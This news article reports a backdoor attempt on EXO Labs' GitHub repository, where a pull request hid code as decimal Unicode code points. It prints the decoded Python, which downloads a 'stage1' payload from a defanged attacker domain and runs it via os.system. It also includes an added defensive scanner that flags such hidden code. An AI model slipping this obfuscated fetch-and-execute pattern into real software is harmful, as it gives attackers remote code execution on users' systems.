GitHub projects have been targeted with malicious commits and pull requests in an attempt to inject backdoors into them.
Most recently, the GitHub repository of Exo Labs, an AI and machine learning startup, was targeted in the attack, which has left many wondering about the attacker’s true intentions.
‘Innocent looking PR’ caught injecting backdoor
On Tuesday, Alex Cheema, co-founder of EXO Labs warned everyone of an “innocent looking” code change submitted to EXO’s GitHub repository.
The pull request, titled “clarify mlx requirement for deepseek models,” attempted to modify the models.py Python file in Exo’s code base by adding a sequence of numbers to it:
Backdoor attempt on @exolabs through an innocent looking PR.
Read every line of code. Stay safu. pic.twitter.com/M0WHoCF5Mu
— Alex Cheema – e/acc (@alexocheema) November 12, 2024
These are decimal Unicode code points, each representing one character. In other words, the plaintext Python code was converted to its numeric equivalent, a simple obfuscation technique employed by the user submitting the code change.
This sequence of characters, “105, 109, 112, 111, 114, 116,…” translates into the following code snippet (URL defanged for safety purposes):
import os
import urllib
import urllib.request
x = urllib.request.urlopen("hxxps://www.evildojo[.]com/stage1payload")
y = x.read()
z = y.decode("utf8")
x.close()
os.system(z)
The rather unsophisticated piece of code attempts to connect to evildojo(.)com and, as it appears, download a “stage1” payload, then hands whatever text it receives to os.system for execution.
Had the code change been approved and merged into EXO’s official repository (it was not), anyone using the product could have ended up executing code remotely served from that URL on their own system, which amounts to a functional backdoor.
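The decimal code-point trick described above is easy to reverse, and just as easy to screen for during code review. The following Python script is an added example, not code from the article or from EXO’s repository: it scans a file for long runs of comma-separated integers, decodes each run as Unicode code points, and reports any run that spells readable text containing tokens a reviewer would want to look at (os.system, urllib.request and similar). The sample file it scans is constructed here, with one harmless numeric list and one list that hides a snippet in the same form as the submitted PR; the token list and regex are assumptions chosen for this demonstration.

```python
"""Flag long decimal code-point sequences that decode to source code.

Added example: scans a Python file (here a constructed sample) for runs of
comma-separated integers, decodes them as Unicode code points, and reports
any run that yields readable text containing tokens a reviewer should see.
"""
import re
from dataclasses import dataclass
from typing import List

# Tokens whose presence in decoded text warrants a reviewer's attention
# (assumed list for this example; extend to taste).
SUSPICIOUS_TOKENS = (
    "import os", "os.system", "urllib.request", "urlopen",
    "subprocess", "exec(", "eval(",
)

# Eight or more comma-separated integers of up to three digits, i.e. runs of
# ASCII-range code points. Non-ASCII code points are out of scope here.
INT_RUN_RE = re.compile(r"(?:\b\d{1,3}\b\s*,\s*){7,}\b\d{1,3}\b")

# Constructed sample file: one benign list and one list hiding a snippet in
# the same decimal code-point form described in the article.
HIDDEN_SNIPPET = "import os\nos.system('echo constructed sample')"
SAMPLE_FILE = (
    "SHARD_SIZES = [1, 2, 3, 4, 5, 6, 7, 8, 9]\n"
    "MODEL_PARAMS = [" + ", ".join(str(ord(c)) for c in HIDDEN_SNIPPET) + "]\n"
)


@dataclass
class Finding:
    line: int          # 1-based line where the integer run starts
    decoded: str       # text the integers decode to
    hits: List[str]    # suspicious tokens seen in the decoded text


def decode_codepoints(run: str) -> str:
    """Turn '105, 109, ...' into the string those code points spell."""
    return "".join(chr(int(tok)) for tok in re.findall(r"\d+", run))


def looks_like_text(s: str) -> bool:
    """Accept only printable characters plus common whitespace."""
    return all(ch.isprintable() or ch in "\n\r\t" for ch in s)


def find_hidden_code(source: str) -> List[Finding]:
    """Return a Finding for every integer run that decodes to readable text."""
    findings: List[Finding] = []
    for m in INT_RUN_RE.finditer(source):
        decoded = decode_codepoints(m.group(0))
        if not looks_like_text(decoded):
            continue  # small ints like [1, 2, 3, ...] become control chars; skip
        hits = [t for t in SUSPICIOUS_TOKENS if t in decoded]
        line_no = source.count("\n", 0, m.start()) + 1
        findings.append(Finding(line_no, decoded, hits))
    return findings


if __name__ == "__main__":
    for f in find_hidden_code(SAMPLE_FILE):
        print(f"line {f.line}: decodes to {f.decoded!r}; tokens: {f.hits}")
```

Run against a real diff, the script reports the line on which the run starts so the reviewer can read the decoded text alongside the original hunk; a run that decodes to readable text but matches no token is still reported, since plain numbers in a model configuration should not spell English or Python at all.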
When accessed by BleepingComputer, however, the link returned a 404 (Not Found), and according to several others who tried to access the URL, no content ever existed at the location from the beginning.
Who is behind it and why?
This is where it gets tricky and there’s no conclusive answer in sight.
The commit appears to have been submitted by a GitHub user, “evildojo666,” an account that has since been deleted.
The archived page for the GitHub username and the domain evildojo(.)com point to Mike Bell, a Texas-based security researcher, ethical hacker, and software engineer who has persistently denied that he had anything to do with these commits.
Bell claims…
Read the full original article at BleepingComputer.